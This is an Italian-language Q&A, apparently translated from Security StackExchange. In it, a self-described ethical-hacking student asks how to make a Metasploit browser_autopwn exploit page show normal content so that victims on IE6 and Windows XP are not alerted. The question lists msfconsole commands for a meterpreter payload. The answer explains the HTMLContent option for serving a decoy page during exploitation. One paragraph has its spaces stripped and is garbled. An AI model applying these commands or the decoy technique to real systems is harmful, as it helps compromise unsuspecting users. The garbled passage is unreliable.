Come modificare la pagina Web dannosa in BindTCP

1

Sto studiando Hacking etico, usando BindTCP su Metasploit, Kali Linux.

Questo video mostra i passaggi e ho sfruttato con successo un Windows XP senza patch che esegue un IE 6 vulnerabile (su la mia rete personale VMWare).

La premessa è convincere la vittima a visitare una pagina web. In questo modo l'attaccante potrà ottenere una sessione meterpreter, quindi accedere alla macchina vittima.

Ma quando la vittima fa clic sulla pagina, è vuota, il che a sua volta solleva sospetti.

Domanda: come modificare la pagina Web in modo che abbia un contenuto normale?

Ecco cosa ho fatto:

root > sudo msfconsole
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit (ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit (ms03_026_dcom) > set RHOST 192.168.1.9
msf exploit (ms03_026_dcom) > set RPORT 445
msf exploit (ms03_026_dcom) > use auxiliary/server/browser_autopwn
msf auxiliary (browser_autopwn) > set LHOST 192.168.1.10
msf auxiliary (browser_autopwn) > exploit

.....

Dopo aver trovato gli exploit, avvia vari server insieme ai link, quindi si conclude con

Quandoaproilcollegamentonellamacchinavittima(usandoIE6),avvialasessionemeterpreterinKaliLinux,

malavittimavedeunapaginaWebvuotaconl'indirizzoWeboriginale.Perfavore,indicamilagiustadirezione.ComefaccioacercareanchetutorialchemostranocomemodificarelapaginaWebdannosaperlavittima.Grazie!

    
posta Rhonda 24.07.2016 - 01:00
fonte

1 risposta

2

L'Autopwn del browser ha un'opzione HTMLContent, che ti consente di mostrare una pagina personalizzata anziché la solita, vuota.

Citando Rapid7 :

The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a blank one. It supports two syntaxes:

set HTMLContent Hello world!

The above example will basically print "Hello world!" on the browser while exploits are tested against it. Here's another one:

set HTMLContent file://tmp/hello_world.html

The above example will load file /tmp/hello_world.html and that's what the browser will see. Most likely the second syntax is how you'd want to use the Content option.

Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise there is a possibility that it might actually influence the reliability of the exploits, especially the ones that do memory corruption.

Per inciso, questo link è il primo risultato di ricerca di Google per "browser autopwn" "vuoto". Non intendo essere scortese, ma penso che, prima di iniziare a lanciare gli exploit a destra e sinistra, dovresti essere in grado di analizzare autonomamente i problemi. Stackexchange e altri forum possono essere utili, ma quando hai intenzione di fare questo genere di cose come lavoro, potresti non avere abbastanza tempo per aspettare una risposta.

Google (o DuckDuckgo o alternative simili) + man / show options / ... andranno molto lontano.

    
risposta data 24.07.2016 - 09:52
fonte

Leggi altre domande sui tag